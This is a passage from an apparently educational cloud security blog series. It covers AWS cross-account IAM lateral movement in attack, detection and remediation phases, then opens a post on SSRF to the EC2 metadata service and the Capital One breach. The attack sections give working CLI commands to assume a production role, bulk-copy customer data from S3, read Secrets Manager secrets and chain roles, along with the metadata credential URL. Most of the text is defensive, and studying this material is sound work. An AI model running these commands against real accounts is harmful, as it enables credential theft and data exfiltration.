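        "Action": "sts:AssumeRole",
    }],
}
print(broad_principals(incident_policy))  # ['arn:aws:iam::111111111111:root']
```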

Red Phase: The Cross-Account Attack Chain

Step 1: Enumerate Trust Policies from a Compromised Role

An attacker’s first move inside a cloud environment is always the same: establish who they are and what they can reach.

aws sts get-caller-identity
# Returns:
# {
#   "UserId": "AROAIOSFODNN7EXAMPLE:function-name",
#   "Account": "111111111111",
#   "Arn": "arn:aws:sts::111111111111:assumed-role/lambda-execution-role/function-name"
# }

# List roles in the current account and their trust policies
# The trust policy (AssumeRolePolicyDocument) shows who can assume each role
aws iam list-roles \
  --query 'Roles[*].[RoleName,AssumeRolePolicyDocument]' \
  --output json | \
  jq '.[] | {
    role: .[0],
    principals: (.[1].Statement[].Principal.AWS // .[1].Statement[].Principal.Service)
  }'

# More targeted: find roles whose trust policy names a principal from another account
# Look for principal ARNs that do not contain this account's ID
aws iam list-roles --output json | \
  jq --arg own_account "111111111111" \
  '.Roles[] |
    .RoleName as $role |
    .AssumeRolePolicyDocument.Statement[] |
    select(
      [.Principal.AWS? // empty
        | if type == "array" then .[] else . end
        | strings | test($own_account) | not] | any
    ) |
    {role: $role, principal: .Principal}'

# Simulate whether the current role's identity policies permit sts:AssumeRole on the target role
# Note: this does not evaluate the target role's trust policy in the other account;
# only the assume-role call itself confirms that the trust policy allows it
aws iam simulate-principal-policy \
  --policy-source-arn arn:aws:iam::111111111111:role/lambda-execution-role \
  --action-names sts:AssumeRole \
  --resource-arns arn:aws:iam::222222222222:role/datalake-reader \
  --query 'EvaluationResults[0].EvalDecision' \
  --output text
# Returns: allowed

Step 2: Assume the Cross-Account Role

# Assume the target role — this is the lateral movement step
aws sts assume-role \
  --role-arn arn:aws:iam::222222222222:role/datalake-reader \
  --role-session-name "recon-$(date +%s)" \
  --query 'Credentials'
# Returns:
# {
#   "AccessKeyId": "ASIAIOSFODNN7EXAMPLE",
#   "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
#   "SessionToken": "IQoJb3JpZ2luX2...(truncated)",
#   "Expiration": "2024-01-15T14:32:00Z"
# }

# Export the credentials to use in subsequent commands
export AWS_ACCESS_KEY_ID="ASIAIOSFODNN7EXAMPLE"
export AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
export AWS_SESSION_TOKEN="IQoJb3JpZ2luX2..."

# Confirm the new identity — now operating in prod account context
aws sts get-caller-identity
# {
#   "Account": "222222222222",  ← prod account
#   "Arn": "arn:aws:sts::222222222222:assumed-role/datalake-reader/recon-1705327920"
# }

Step 3: Enumerate and Exfiltrate from Prod

# What buckets are accessible from this role?
aws s3 ls

# Enumerate the data lake bucket
aws s3 ls --recursive s3://prod-datalake-bucket | \
  awk '{print $3, $4}' | \
  sort -rn | \
  head -20
# Shows: file sizes and paths
# 15728640  customer-data/2024/01/customer-data.parquet
# 8388608   analytics/sessions/session-events.parquet
# ...

# Exfiltrate: the recursive copy issues one GetObject call per object. These are S3
# data events, which CloudTrail records only if data event logging is enabled
aws s3 cp s3://prod-datalake-bucket/customer-data/2024/01/ /tmp/ \
  --recursive \
  --quiet

# Check for Secrets Manager access
aws secretsmanager list-secrets \
  --query 'SecretList[].{Name:Name,LastRotated:LastRotatedDate}' \
  --output table

aws secretsmanager get-secret-value \
  --secret-id prod/analytics-db/credentials \
  --query 'SecretString' \
  --output text

Step 4: Role Chaining — Staying in the Environment

Role chaining is assuming one role then using that session to assume another. It extends the attacker’s reach without returning to the original compromised identity.

# From the prod datalake-reader context, can we go further?
# Check what other roles trust this prod role, or what this role can assume
aws iam list-roles --output json | \
  jq '.Roles[] | 
    select(.AssumeRolePolicyDocument.Statement[].Principal.AWS? | 
      strings | 
      test("datalake-reader")
    ) | .RoleName'

# If the datalake-reader role has sts:AssumeRole permissions itself,
# the chain continues — each hop gets a fresh 1-hour session
aws sts assume-role \
  --role-arn arn:aws:iam::222222222222:role/analytics-admin \
  --role-session-name "second-hop-$(date +%s)"

Tools Attackers Use for Cloud Lateral Movement Enumeration

Pacu (Rhino Security Labs): Modular AWS exploitation framework. The iam__enum_users_roles_policies_groups and iam__privesc_scan modules map the full IAM graph and identify assumption paths automatically.

# Pacu: enumerate IAM and find assumable roles
pacu
> run iam__enum_users_roles_policies_groups
> run iam__privesc_scan

CloudFox (Bishop Fox): Designed specifically for finding attack paths in cloud environments. The role-trusts command enumerates IAM role trust policies and shows which principals, including cross-account ones, can assume each role.

# CloudFox: list role trust relationships visible to the current identity
cloudfox aws -p target-profile role-trusts -v2

# CloudFox: find all cross-account trust relationships
cloudfox aws -p target-profile resource-trusts -v2

aws-recon: Broad enumeration tool that maps IAM, S3, EC2, RDS, Secrets Manager, and trust relationships across accounts in a single pass.

Blue Phase: Detection

CloudTrail Signal: Cross-Account AssumeRole

Every sts:AssumeRole call is logged in CloudTrail. Cross-account calls are the specific signal to filter for.

# Query CloudTrail for cross-account AssumeRole events in the last 24 hours
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=AssumeRole \
  --start-time "$(date -d '24 hours ago' --iso-8601=seconds)" \
  --output json | \
  jq '.Events[].CloudTrailEvent | fromjson |
    .userIdentity.accountId as $source |
    select(
      .requestParameters.roleArn != null and
      $source != null and
      (.requestParameters.roleArn | contains($source) | not)
    ) |
    {
      time: .eventTime,
      source_identity: .userIdentity.arn,
      source_account: .userIdentity.accountId,
      assumed_role: .requestParameters.roleArn,
      session_name: .requestParameters.roleSessionName,
      source_ip: .sourceIPAddress
    }'

The CloudTrail event structure for a cross-account assumption looks like this:

{
  "eventSource": "sts.amazonaws.com",
  "eventName": "AssumeRole",
  "userIdentity": {
    "type": "AssumedRole",
    "accountId": "111111111111",
    "arn": "arn:aws:sts::111111111111:assumed-role/lambda-execution-role/function-name"
  },
  "requestParameters": {
    "roleArn": "arn:aws:iam::222222222222:role/datalake-reader",
    "roleSessionName": "recon-1705327920"
  },
  "sourceIPAddress": "203.0.113.42",
  "userAgent": "aws-cli/2.13.0 Python/3.11.0 Linux/5.15.0"
}

The key fields: userIdentity.accountId is 111111111111 (dev), requestParameters.roleArn contains 222222222222 (prod). Those two account IDs not matching is the cross-account signal.

A fresh-compromise indicator: a userAgent of aws-cli on a role that normally calls AWS APIs only from the Lambda runtime, where calls go through an AWS SDK (Boto3 for Python functions) and report an SDK user agent. Lambda functions do not normally invoke the CLI, so an aws-cli user agent on a Lambda execution role points to a human or an automated tool using stolen credentials.
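Both signals can be checked on a decoded event record. The sketch below is a minimal Python illustration, assuming the event has already been parsed into a dictionary shaped like the example above; the function names and the `aws-cli/` prefix check are illustrative assumptions, not part of any AWS SDK.

```python
import re

# Captures the 12-digit account ID inside an IAM role ARN (any AWS partition).
ROLE_ARN_ACCOUNT = re.compile(r"^arn:aws[\w-]*:iam::(\d{12}):role/")


def target_account(role_arn):
    """Return the account ID embedded in a role ARN, or None if it does not parse."""
    match = ROLE_ARN_ACCOUNT.match(role_arn or "")
    return match.group(1) if match else None


def is_cross_account_assume_role(event):
    """True when the caller's account differs from the account owning the target role."""
    if event.get("eventName") != "AssumeRole":
        return False
    source = (event.get("userIdentity") or {}).get("accountId")
    target = target_account((event.get("requestParameters") or {}).get("roleArn"))
    return source is not None and target is not None and source != target


def is_cli_user_agent(event):
    """True when the call was made with the AWS CLI rather than an SDK runtime."""
    return (event.get("userAgent") or "").startswith("aws-cli/")


# The example event from the text, reduced to the fields the checks read.
sample_event = {
    "eventName": "AssumeRole",
    "userIdentity": {"accountId": "111111111111"},
    "requestParameters": {"roleArn": "arn:aws:iam::222222222222:role/datalake-reader"},
    "userAgent": "aws-cli/2.13.0 Python/3.11.0 Linux/5.15.0",
}

if __name__ == "__main__":
    print(is_cross_account_assume_role(sample_event), is_cli_user_agent(sample_event))
```

An event that trips both checks on a Lambda execution role is a reasonable candidate for immediate triage; either check alone will also match legitimate activity.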

Athena Query: Cross-Account Assumptions Across the Organization

-- Athena against S3-backed CloudTrail logs (org-level trail)
-- Finds all cross-account AssumeRole events in the past 7 days
-- Assumes the standard CloudTrail table, where requestparameters is a JSON string
SELECT
  eventtime,
  useridentity.accountid AS source_account,
  useridentity.arn AS source_identity,
  json_extract_scalar(requestparameters, '$.roleArn') AS target_role,
  sourceipaddress,
  useragent,
  -- Flag: event occurred within the last 5 hours (300 minutes)
  CASE
    WHEN date_diff(
      'minute',
      from_iso8601_timestamp(eventtime),
      current_timestamp
    ) < 300 THEN 'RECENT'
    ELSE 'AGED'
  END AS session_age
FROM cloudtrail_logs
WHERE
  eventsource = 'sts.amazonaws.com'
  AND eventname = 'AssumeRole'
  AND errorcode IS NULL
  AND from_iso8601_timestamp(eventtime) > current_timestamp - interval '7' day
  -- Cross-account: source account ID differs from the account in the target role ARN
  AND useridentity.accountid <> regexp_extract(
    json_extract_scalar(requestparameters, '$.roleArn'),
    'arn:aws:iam::(\d+):',
    1
  )
ORDER BY eventtime DESC;

GuardDuty Findings for IAM Lateral Movement

GuardDuty surfaces the following finding types relevant to cross-account lateral movement:

Finding Type	What It Signals
`Discovery:IAMUser/AnomalousBehavior`	Identity enumerating IAM roles, policies, or permissions in an unusual way, consistent with Step 1 (replaces the retired `Recon:IAMUser/UserPermissions`)
`PrivilegeEscalation:IAMUser/AnomalousBehavior`	API calls attempting to gain elevated permissions (replaces the retired `PrivilegeEscalation:IAMUser/AdministrativePermissions`)
`UnauthorizedAccess:IAMUser/TorIPCaller`	Assumed role used from Tor exit node
`CredentialAccess:IAMUser/AnomalousBehavior`	Credential access pattern deviates from baseline
`Exfiltration:S3/AnomalousBehavior`	Anomalous S3 read activity; can fire after the exfiltration in Step 3 (replaces the retired `Exfiltration:S3/ObjectRead.Unusual`)

# Pull active GuardDuty findings scoped to IAM lateral movement indicators
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)

aws guardduty list-findings \
  --detector-id "${DETECTOR_ID}" \
  --finding-criteria '{
    "Criterion": {
      "type": {
        "Equals": [
          "Discovery:IAMUser/AnomalousBehavior",
          "PrivilegeEscalation:IAMUser/AnomalousBehavior",
          "CredentialAccess:IAMUser/AnomalousBehavior",
          "Exfiltration:S3/AnomalousBehavior"
        ]
      },
      "severity": {
        "GreaterThanOrEqual": 4
      }
    }
  }' \
  --query 'FindingIds' --output text | \
  xargs -r -n 10 aws guardduty get-findings \
    --detector-id "${DETECTOR_ID}" \
    --finding-ids | \
  jq '.Findings[] | {
    type: .Type,
    severity: .Severity,
    account: .AccountId,
    resource: .Resource.AccessKeyDetails.UserName,
    created: .CreatedAt
  }'

AWS Access Analyzer: Automated Trust Policy Audit

Access Analyzer evaluates resource-based policies on the resource types it supports (IAM role trust policies, S3 bucket policies, KMS key policies, and others) and flags any that grant access to principals outside the account or organization. It can surface the vulnerable trust policy before an attacker finds it.

# List all Access Analyzer findings — these are cross-account or public access grants
ANALYZER_ARN=$(aws accessanalyzer list-analyzers \
  --query 'analyzers[0].arn' --output text)

aws accessanalyzer list-findings \
  --analyzer-arn "${ANALYZER_ARN}" \
  --filter '{"status": {"eq": ["ACTIVE"]}}' \
  --output json | \
  jq '.findings[] | {
    id: .id,
    resource_type: .resourceType,
    resource: .resource,
    principal: .principal,
    action: .action,
    condition: .condition,
    created: .createdAt
  }'

An Access Analyzer finding for the vulnerable trust policy looks like:

{
  "id": "a1b2c3d4-...",
  "resourceType": "AWS::IAM::Role",
  "resource": "arn:aws:iam::222222222222:role/datalake-reader",
  "principal": {"AWS": "arn:aws:iam::111111111111:root"},
  "action": ["sts:AssumeRole"],
  "condition": {},
  "status": "ACTIVE"
}

The arn:aws:iam::111111111111:root principal with no condition block is the flag — the entire dev account, no restrictions.

Purple Phase: Structural Fixes

Fix 1: Scope the Trust Policy to the Specific Source ARN

This is the primary fix. The trust policy should name the exact role that needs access, not the account root.

// BAD — allows any identity in the dev account to assume this role
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::111111111111:root"
      },
      "Action": "sts:AssumeRole"
    }
  ]
}

// GOOD — only the specific Lambda execution role can assume this role
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::111111111111:role/api-processor-lambda-execution-role"
      },
      "Action": "sts:AssumeRole",
      "Condition": {
        "StringEquals": {
          "sts:ExternalId": "prod-datalake-access-v1"
        }
      }
    }
  ]
}

# Update an existing trust policy to scope it properly
aws iam update-assume-role-policy \
  --role-name datalake-reader \
  --policy-document file://scoped-trust-policy.json
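Before updating policies by hand, it can help to scan trust policy documents for the account-root pattern. The following is a minimal Python sketch, assuming each trust policy is available as a decoded dictionary (for example, from `aws iam get-role` output); the function name is an illustrative assumption, and the check covers only the `AWS` principal forms discussed here.

```python
def account_root_statements(trust_policy):
    """Return Allow statements that trust an entire account (the ':root' principal)."""
    statements = trust_policy.get("Statement", [])
    if isinstance(statements, dict):  # a single statement may be given as an object
        statements = [statements]

    flagged = []
    for stmt in statements:
        if stmt.get("Effect") != "Allow":
            continue
        principal = stmt.get("Principal", {})
        if not isinstance(principal, dict):
            continue  # e.g. "*", which this sketch does not attempt to classify
        aws = principal.get("AWS", [])
        if isinstance(aws, str):
            aws = [aws]
        # A bare 12-digit account ID is equivalent to the :root ARN form.
        if any(p.endswith(":root") or (p.isdigit() and len(p) == 12) for p in aws):
            flagged.append(stmt)
    return flagged


bad_policy = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {"AWS": "arn:aws:iam::111111111111:root"},
            "Action": "sts:AssumeRole",
        }
    ],
}

good_policy = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::111111111111:role/api-processor-lambda-execution-role"
            },
            "Action": "sts:AssumeRole",
        }
    ],
}

if __name__ == "__main__":
    print(len(account_root_statements(bad_policy)), len(account_root_statements(good_policy)))
```

Run over every role in an account, a non-empty result marks the trust policies that need the scoping change shown above.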

Fix 2: Add ExternalId for Confused Deputy Protection

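ExternalId is an identifier agreed between the two parties establishing the cross-account trust. When the source role calls sts:AssumeRole, it must provide the ExternalId value, or the assumption is denied. AWS does not treat the value as a secret; its job is to bind a request to one specific trust relationship.

This protects against the confused deputy problem: a principal that is allowed to assume roles on behalf of several parties can be tricked by one of them into assuming a role that belongs to another. Because each relationship has its own ExternalId, a request made on behalf of the wrong party carries the wrong value and fails.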

# Source (dev Lambda) must pass ExternalId when assuming the prod role
aws sts assume-role \
  --role-arn arn:aws:iam::222222222222:role/datalake-reader \
  --role-session-name "api-processor-job" \
  --external-id "prod-datalake-access-v1"
# If ExternalId is wrong or absent: error — not authorized to assume role

The limitation: ExternalId does not help if the source account itself is compromised and the attacker has access to the application code or environment variables that contain the ExternalId value. It adds friction for opportunistic attackers and covers the confused deputy scenario — it is not a substitute for scoping the principal ARN.
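To make the interaction between principal scoping and ExternalId concrete, here is a deliberately simplified model in Python. It is a toy check over a single statement, not IAM's actual policy evaluation; the function name `trust_allows` and the second role name are hypothetical.

```python
def trust_allows(statement, caller_arn, external_id=None):
    """Toy check: does one Allow statement admit this caller? Not IAM's real evaluator."""
    principals = statement["Principal"]["AWS"]
    if isinstance(principals, str):
        principals = [principals]

    # An account-root principal admits any caller from that account.
    caller_account = caller_arn.split(":")[4]
    principal_ok = any(
        p == caller_arn or p == f"arn:aws:iam::{caller_account}:root"
        for p in principals
    )

    # If the statement requires an ExternalId, the caller must pass the same value.
    required = statement.get("Condition", {}).get("StringEquals", {}).get("sts:ExternalId")
    external_ok = required is None or external_id == required
    return principal_ok and external_ok


scoped_statement = {
    "Effect": "Allow",
    "Principal": {"AWS": "arn:aws:iam::111111111111:role/api-processor-lambda-execution-role"},
    "Action": "sts:AssumeRole",
    "Condition": {"StringEquals": {"sts:ExternalId": "prod-datalake-access-v1"}},
}

LAMBDA_ROLE = "arn:aws:iam::111111111111:role/api-processor-lambda-execution-role"
OTHER_ROLE = "arn:aws:iam::111111111111:role/some-other-dev-role"  # hypothetical

if __name__ == "__main__":
    print(trust_allows(scoped_statement, LAMBDA_ROLE))                             # missing ExternalId
    print(trust_allows(scoped_statement, OTHER_ROLE, "prod-datalake-access-v1"))   # wrong principal
    print(trust_allows(scoped_statement, LAMBDA_ROLE, "prod-datalake-access-v1"))  # both match
```

The last call is the limitation in miniature: whoever holds the scoped role's credentials and can read the ExternalId passes both checks, which is why the principal scope carries most of the weight.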

Fix 3: Organizations SCPs to Restrict Cross-Account Assumptions

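Service Control Policies at the AWS Organizations level restrict what principals inside the accounts they are attached to can do, including which accounts those principals may assume roles in. This is the enforcement layer that cannot be bypassed by any identity inside a member account. An SCP does not filter requests arriving from principals in other accounts, so it is attached on the source side of the trust relationship.

// SCP: principals in the attached accounts may only assume roles in approved target accounts
// Attach to the OU that contains the source (dev) accounts
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "RestrictCrossAccountAssumeRole",
      "Effect": "Deny",
      "Action": "sts:AssumeRole",
      "Resource": "*",
      "Condition": {
        "StringNotEquals": {
          "aws:ResourceAccount": [
            "111111111111",
            "222222222222"
          ]
        }
      }
    }
  ]
}

This SCP denies any sts:AssumeRole call made by a principal in the attached accounts when the target role lives in an account outside the approved list (here, the dev account itself and the one approved prod account). Even if someone adds a trust policy in another account that allows the dev account, a compromised dev identity cannot use it, because the SCP blocks the call at the organization level. Calls from principals outside the organization are not covered by SCPs; those still depend on the trust policy itself.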

Fix 4: Enable Access Analyzer Organization-Wide

Access Analyzer should run with an organization-level analyzer, not just per-account. The organization analyzer has visibility across all member accounts and flags cross-account trust policies automatically.

# Create an organization-level analyzer (run from the management account)
aws accessanalyzer create-analyzer \
  --analyzer-name org-wide-access-analyzer \
  --type ORGANIZATION \
  --tags '{"Environment": "production", "Team": "security"}'

# List active findings organization-wide
ANALYZER_ARN=$(aws accessanalyzer list-analyzers \
  --query "analyzers[?type=='ORGANIZATION'].arn | [0]" \
  --output text)

aws accessanalyzer list-findings \
  --analyzer-arn "${ANALYZER_ARN}" \
  --filter '{"resourceType": {"eq": ["AWS::IAM::Role"]}, "status": {"eq": ["ACTIVE"]}}' \
  --output json | \
  jq '.findings[] | {resource: .resource, principal: .principal}'

Fix 5: Prefer OIDC Workload Identity Over Cross-Account Roles

Where the access pattern allows it, replacing the account-scoped cross-account role with OIDC workload identity narrows the trust relationship considerably. A workload with an OIDC identity presents a short-lived token from its identity provider and exchanges it for credentials through sts:AssumeRoleWithWebIdentity.

The target role still has a trust policy, but it trusts an OIDC provider and is conditioned on token claims such as sub and aud rather than on an account-wide principal, which leaves far less room to misscope it. The exchange is recorded in CloudTrail as AssumeRoleWithWebIdentity rather than AssumeRole, so detection queries need to cover both event names.

Fix 6: Enable GuardDuty Cross-Account Threat Detection at Org Level

GuardDuty with multi-account management via AWS Organizations correlates threat signals across accounts. A pattern that looks like routine IAM activity in isolation — role assumption, S3 ListBucket, GetObject — reads as a lateral movement sequence when correlated across dev and prod accounts.

# Enable GuardDuty for all accounts in the organization (from the GuardDuty delegated administrator account)
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)

aws guardduty update-organization-configuration \
  --detector-id "${DETECTOR_ID}" \
  --auto-enable \
  --data-sources '{
    "S3Logs": {"AutoEnable": true},
    "Kubernetes": {"AuditLogs": {"AutoEnable": true}},
    "MalwareProtection": {"ScanEc2InstanceWithFindings": {"EbsVolumes": {"AutoEnable": true}}}
  }'

⚠ Production Gotchas

ExternalId doesn’t protect you if the source account is compromised. The attacker who holds the dev Lambda’s execution role credentials also has access to the Lambda’s environment variables and source code — where the ExternalId value is likely stored. ExternalId is not a secret the attacker can’t reach; it is a value the legitimate caller passes to prove it initiated the request. Scope the principal ARN first; add ExternalId as a second layer.

Access Analyzer only catches public and cross-account access, not intra-account lateral movement. If the attacker is already operating inside the same account as the target role, Access Analyzer does not flag the trust relationship. Intra-account over-broad trust policies require IAM policy analysis tooling (Cloudsplaining, Prowler) to surface — Access Analyzer won’t show them.

Role chaining resets the session clock but the window is still one hour. sts:AssumeRole sessions default to one hour, and a session obtained through role chaining is capped at one hour regardless of the role’s configured maximum. An attacker doing role chaining gets a fresh one-hour window at each hop. Persistent access requires refreshing before expiry, which means repeated AssumeRole calls in CloudTrail that form a detectable pattern if you’re querying for it.
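The refresh pattern described above can be looked for directly in exported CloudTrail records. This is a minimal Python sketch, assuming events are already decoded into dictionaries; the function names and the thresholds (three or more calls, gaps of at most one hour) are illustrative assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def parse_time(value):
    """Parse a CloudTrail eventTime such as 2024-01-15T13:32:00Z."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def refresh_patterns(events, min_calls=3, max_gap=timedelta(hours=1)):
    """Return (source ARN, role ARN) pairs re-assumed at least min_calls times
    with every gap between consecutive calls no longer than max_gap."""
    by_pair = defaultdict(list)
    for event in events:
        if event.get("eventName") != "AssumeRole":
            continue
        key = (event["userIdentity"]["arn"], event["requestParameters"]["roleArn"])
        by_pair[key].append(parse_time(event["eventTime"]))

    flagged = []
    for key, times in by_pair.items():
        times.sort()
        gaps = [later - earlier for earlier, later in zip(times, times[1:])]
        if len(times) >= min_calls and all(gap <= max_gap for gap in gaps):
            flagged.append(key)
    return flagged
```

Legitimate automation also refreshes sessions on a schedule, so the output is a list to compare against known jobs rather than a verdict.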

S3 exfiltration may not trigger GuardDuty immediately. GuardDuty’s Exfiltration:S3/AnomalousBehavior finding (the successor to the retired Exfiltration:S3/ObjectRead.Unusual) uses a behavior baseline. A new attacker session has no baseline of its own, so the first data exfiltration may not fire the finding if the volume appears “normal” relative to what GuardDuty has seen from that role before. CloudTrail GetObject data events, which must be enabled explicitly on the trail, are the reliable signal; don’t rely on GuardDuty alone for S3 exfiltration detection.
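A simple volume check over GetObject records can act as a baseline-free complement. The sketch below is a minimal Python illustration; it assumes S3 data events are being logged and that each record carries `additionalEventData.bytesTransferredOut`, and the function names and threshold are hypothetical.

```python
from collections import Counter


def bytes_read_by_principal(events):
    """Sum bytes returned by S3 GetObject calls, keyed by the calling identity ARN."""
    totals = Counter()
    for event in events:
        if event.get("eventSource") != "s3.amazonaws.com":
            continue
        if event.get("eventName") != "GetObject":
            continue
        extra = event.get("additionalEventData") or {}
        # Treat a missing byte count as zero rather than guessing.
        totals[event["userIdentity"]["arn"]] += int(extra.get("bytesTransferredOut", 0))
    return totals


def heavy_readers(events, threshold_bytes):
    """Return identity ARNs whose total GetObject volume meets or exceeds the threshold."""
    totals = bytes_read_by_principal(events)
    return sorted(arn for arn, total in totals.items() if total >= threshold_bytes)
```

A fixed threshold is crude, but unlike a learned baseline it fires on the first large read from a freshly stolen session.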

arn:aws:iam::ACCOUNT:root in a trust policy does not mean the root user specifically. This is a common misread. arn:aws:iam::123456789012:root delegates the decision to account 123456789012: any principal there (IAM users, roles, the root user, and federated identities) whose own identity policy allows sts:AssumeRole on the role can assume it. It is the account-level wildcard, which is exactly why it’s dangerous in a cross-account trust policy.

Quick Reference

Lateral Movement Technique	CloudTrail Signal	Detection Tool	Structural Fix
Cross-account `sts:AssumeRole`	`AssumeRole` where source accountId ≠ target accountId in role ARN	CloudTrail + Athena query	Scope Principal to specific role ARN
Account root as trust principal	Access Analyzer ACTIVE finding on IAM Role	AWS Access Analyzer	Replace `root` with specific ARN + ExternalId
Role chaining across accounts	Multiple sequential `AssumeRole` events, each with new session token	CloudTrail session correlation	SCP restricting cross-account assumptions to approved pairs
Exfiltration via assumed prod role	S3 `GetObject`/`ListBucket` from assumed-role session in CloudTrail	CloudTrail + GuardDuty `Exfiltration:S3/AnomalousBehavior`	Least-privilege S3 policy on prod role + S3 Access Logs
IAM enumeration from compromised identity	`iam:ListRoles`, `iam:GetRole`, `iam:SimulatePrincipalPolicy`	GuardDuty `Discovery:IAMUser/AnomalousBehavior`	Deny `iam:*` on Lambda execution roles
Secrets Manager access via assumed role	`secretsmanager:GetSecretValue` from unexpected principal	CloudTrail resource policy audit	Attach resource policy to secrets scoping allowed principals

Key Takeaways

Cloud lateral movement IAM chains are not exploits — they are valid API calls that execute because someone wrote a trust policy that was too broad; the fix is always in the trust policy, not in the network
Every cross-account trust policy that uses arn:aws:iam::ACCOUNT:root as the principal is an open door for any compromised identity in that account; scope it to the specific role ARN before an attacker finds it
CloudTrail AssumeRole events where the principal’s account ID doesn’t match the target role’s account ID are the detection signal; run the Athena query in your environment this week and look at what comes back
AWS Access Analyzer with an organization-level analyzer surfaces the vulnerable trust policies automatically — if you’re not running it, you’re auditing trust policies manually or not at all
IAM privilege escalation paths and cross-account lateral movement compound: an attacker who escalates privilege inside a source account has more roles to attempt cross-account assumptions from, extending the blast radius further
Defense in depth requires all three layers: scoped trust policy principal, ExternalId condition, and an SCP blocking assumptions from non-approved accounts — any single layer has a bypass

What’s Next

EP11 is where the series pivots from attack paths to detection engineering. We’ve covered how attackers compromise identities, escalate privilege, move laterally through cloud accounts, and exfiltrate data. EP11 asks a harder question: how do you build detection rules that catch these techniques at the kernel level — before the attack completes, not after it shows up in CloudTrail?

The answer involves eBPF: kernel-level visibility that gives you process execution context, network connections, and file system access in real time, mapped to the cloud workload identity making the API calls. A SIEM ingesting CloudTrail logs sees what happened after the fact. eBPF running on the node sees the aws sts assume-role subprocess spawn, the credential file write, and the outbound S3 connection — while it’s happening.


SSRF to Cloud Metadata: How IMDSv1 Enabled the Capital One Breach

June 22, 2026 by Vamshi Krishna Santhapuri

Reading Time: 15 minutes


TL;DR

SSRF cloud metadata attack is OWASP A10: an attacker exploits a server-side request forgery vulnerability to reach 169.254.169.254 — the EC2 Instance Metadata Service — and retrieve IAM role credentials without authentication
IMDSv1 (the only version available before November 2019) requires no authentication token; any HTTP request from the instance to the IMDS endpoint returns credentials, so SSRF anywhere in the software running on the instance is sufficient
Capital One (2019): a misconfigured WAF running on EC2 had an SSRF vulnerability → attacker hit the IMDS endpoint → retrieved IAM role credentials → enumerated and exfiltrated over 100 million customer records from S3; $190M settlement
IMDSv2 requires a PUT request with a custom header to obtain a session token first, a step most SSRF primitives cannot perform, making the IMDS resistant to standard SSRF exploitation; --http-tokens required is the one-line enforcement
Hop limit of 1 is the container-layer defense: the token response is sent with a TTL of 1, so it expires before reaching a container that sits behind an extra network hop (for example, bridge networking); containers that share the host network are not covered
The structural fix is eliminating the credential entirely: OIDC workload identity replaces the attached IAM role with a dynamically issued, scoped token, leaving no IMDS credential to steal

OWASP Mapping: A10 — Server-Side Request Forgery (SSRF). The attacker causes the server to make a request to an unintended destination — in this case, the link-local metadata endpoint that returns cloud IAM credentials.

The Big Picture

┌─────────────────────────────────────────────────────────────────────────┐
│                    SSRF → IMDS → CREDENTIAL CHAIN                       │
│                                                                         │
│   ATTACKER                                                              │
│      │                                                                  │
│      │  1. Discovers SSRF in web app (WAF, proxy, image fetch, etc.)    │
│      │                                                                  │
│      ▼                                                                  │
│   WEB APP / WAF (running on EC2)                                        │
│      │                                                                  │
│      │  2. App follows attacker-controlled URL                          │
│      │     GET http://169.254.169.254/latest/meta-data/                 │
│      │     iam/security-credentials/ROLE_NAME                          │
│      ▼                                                                  │
│   EC2 INSTANCE METADATA SERVICE (IMDSv1 — no auth required)            │
│      │                                                                  │
│      │  3. Returns JSON: AccessKeyId, SecretAccessKey, Token            │
│      ▼                                                                  │
│   ATTACKER (now has temporary IAM credentials)                          │
│      │                                                                  │
│      │  4. aws sts get-caller-identity → confirm identity               │
│      │  5. aws s3 ls → enumerate all accessible buckets                 │
│      │  6. aws s3 cp s3://target-bucket/ . --recursive                  │
│      ▼                                                                  │
│   100M+ customer records exfiltrated                                    │
│                                                                         │
│   ─────────────────────────────────────────────────────────────────     │
│   IMDSv2 BREAKS THIS CHAIN AT STEP 2                                    │
│   PUT /latest/api/token required first → SSRF can't follow             │
│   (SSRF typically cannot initiate a PUT before a GET)                   │
│                                                                         │
└─────────────────────────────────────────────────────────────────────────┘

The SSRF cloud metadata attack chain is short enough to fit in a single diagram because there are only three moving parts: the SSRF vulnerability, an unauthenticated metadata endpoint, and the IAM credentials waiting behind it. Remove any one of those three elements and the chain breaks. Capital One had all three.
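The break point shown in the diagram becomes clearer when looking at the two requests a legitimate IMDSv2 client sends. The following is a minimal Python sketch using only the standard library; the helper names are illustrative assumptions, and `fetch_role_name` only works when run on an EC2 instance.

```python
import urllib.request

IMDS = "http://169.254.169.254"


def token_request(ttl_seconds=21600):
    """Step 1: a PUT with a TTL header. A GET-only SSRF cannot produce this request."""
    return urllib.request.Request(
        f"{IMDS}/latest/api/token",
        method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": str(ttl_seconds)},
    )


def metadata_request(path, token):
    """Step 2: a GET that must carry the session token from step 1 in a header."""
    return urllib.request.Request(
        f"{IMDS}/latest/meta-data/{path}",
        headers={"X-aws-ec2-metadata-token": token},
    )


def fetch_role_name(timeout=2):
    """Run both steps and return the attached role name (EC2 instances only)."""
    with urllib.request.urlopen(token_request(), timeout=timeout) as resp:
        token = resp.read().decode()
    request = metadata_request("iam/security-credentials/", token)
    with urllib.request.urlopen(request, timeout=timeout) as resp:
        return resp.read().decode().strip()
```

An SSRF primitive that can only make the server issue a GET to an attacker-chosen URL has no way to perform step 1 or to attach the header in step 2, which is where the chain stops.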

The Incident: Capital One (2019)

In March 2019, a misconfigured WAF at Capital One was running on AWS EC2. The WAF, widely reported to have been the open-source ModSecurity, was deployed on an EC2 instance with an attached IAM role, which is standard practice and necessary for the WAF to interact with other AWS services.

